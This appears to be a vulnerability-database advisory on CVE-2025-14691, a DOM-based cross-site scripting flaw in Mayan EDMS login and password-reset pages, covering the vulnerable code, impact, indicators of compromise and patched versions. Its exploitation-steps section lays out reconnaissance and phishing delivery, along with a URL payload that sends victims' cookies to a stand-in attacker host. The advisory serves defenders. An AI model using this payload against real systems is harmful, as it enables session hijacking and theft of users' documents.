CVE-2025-14691: 
Python vulnerability analysis and mitigation

Overview

CVE-2025-14691 is a DOM-based Cross-Site Scripting (XSS) vulnerability in Mayan EDMS affecting the /authentication/ module. It was disclosed on December 14, 2025, and affects Mayan EDMS versions prior to 4.10.2, 4.9.7, 4.8.10, 4.7.8, and 4.6.12 across multiple release branches. The vulnerability is exploitable by unauthenticated remote attackers and requires user interaction (passive) to trigger. It carries a CVSS v3.1 base score of 6.1 (Medium) and a CVSS v4.0 base score of 2.1 (Low) (GitHub Advisory, Feedly).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation) and CWE-94 (Improper Control of Code Generation). The vulnerability arises from insecure handling of window.location within client-side JavaScript templates: the application appends window.location.hash — which is fully attacker-controlled — into navigation logic without sanitization, allowing injection of arbitrary JavaScript (GitHub PoC). The vulnerable code pattern is:

if (typeof partialNavigation === 'undefined') {
  document.write('<script type="text/undefined">')
  const currentLocation = '#' + window.location.pathname + window.location.search;
  const url = new URL(currentLocation, window.location.origin)
  window.location = url;
}

Multiple authentication-related endpoints are affected (e.g., /authentication/login/, /authentication/password/reset/) because they all rely on the same vulnerable JavaScript fragment. No authentication is required to craft a malicious URL (GitHub Advisory, GitHub PoC).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser within the context of the Mayan EDMS application. Potential consequences include theft of session cookies, hijacking of authenticated user sessions, performing unauthorized actions on behalf of the victim, and redirecting users to malicious websites. Availability is not impacted, and direct server-side compromise is not possible through this vector alone; however, session hijacking could enable further access to sensitive documents managed within the EDMS (GitHub Advisory, Feedly).

Exploitability

A public proof-of-concept exploit is available on GitHub, published by researcher ionutluca888, demonstrating the DOM-based XSS across multiple authentication endpoints (GitHub PoC). The EPSS score is approximately 0.088% (19th percentile), indicating a low but non-zero probability of exploitation in the wild within 30 days. No evidence of active in-the-wild exploitation or threat actor attribution has been reported, and the vulnerability is not listed in the CISA KEV catalog (GitHub Advisory).

Exploitation steps

  1. Reconnaissance: Identify internet-facing Mayan EDMS instances running versions prior to 4.10.2, 4.9.7, 4.8.10, 4.7.8, or 4.6.12 using search engines or network scanning tools.
  2. Craft malicious URL: Construct a URL targeting one of the vulnerable authentication endpoints with a JavaScript payload in the URL fragment, for example: http://target/authentication/login/#javascript:alert("XSS") or a more harmful payload such as: http://target/authentication/login/#javascript:document.location='https://attacker.com/steal?c='+document.cookie
  3. Deliver to victim: Send the crafted URL to a target user via phishing email, social engineering, or embedding it in a web page. No authentication is required on the attacker's part.
  4. Trigger execution: When the victim opens the URL in their browser, the vulnerable JavaScript template processes window.location.hash without sanitization, causing the injected script to execute in the victim's browser context.
  5. Achieve objective: The executed script can exfiltrate session cookies, perform actions on behalf of the authenticated user, or redirect the victim to an attacker-controlled site (GitHub PoC, GitHub Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to unexpected external domains immediately after visiting Mayan EDMS authentication pages; referrer headers in server logs pointing to authentication endpoints with #javascript: fragments.
  • Logs: Web server access logs showing requests to /authentication/login/, /authentication/password/reset/, or related endpoints with URL fragments containing javascript: or encoded script payloads; unusual session activity following visits to these endpoints.
  • Browser/Client-Side: Unexpected JavaScript execution dialogs or redirects when navigating to Mayan EDMS authentication pages; browser console errors related to URL parsing on authentication endpoints.

Mitigation and workarounds

The vendor has released patched versions addressing this vulnerability: 4.10.2, 4.9.7, 4.8.10, 4.7.8, and 4.6.12 for their respective release branches. Upgrading to the appropriate patched version is the recommended remediation. As interim mitigations, administrators should implement a strict Content Security Policy (CSP) header to restrict script execution sources, enforce input validation and output encoding, and educate users about phishing risks involving crafted URLs. The vendor confirmed the fix in version 4.10.2 and noted that backports for older versions were in progress (GitHub Advisory, Mayan EDMS Release Notes).

Community reactions

The vulnerability was assigned by VulDB and acknowledged by the Mayan EDMS vendor, who confirmed the fix in version 4.10.2 and committed to backporting patches for older supported versions. The issue received coverage from security aggregators including INCIBE-CERT and was noted in ISC StormCast for December 15, 2025. Community reaction has been limited given the low severity rating, with no significant researcher commentary or media coverage beyond standard vulnerability tracking (Feedly, GitHub Advisory).

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management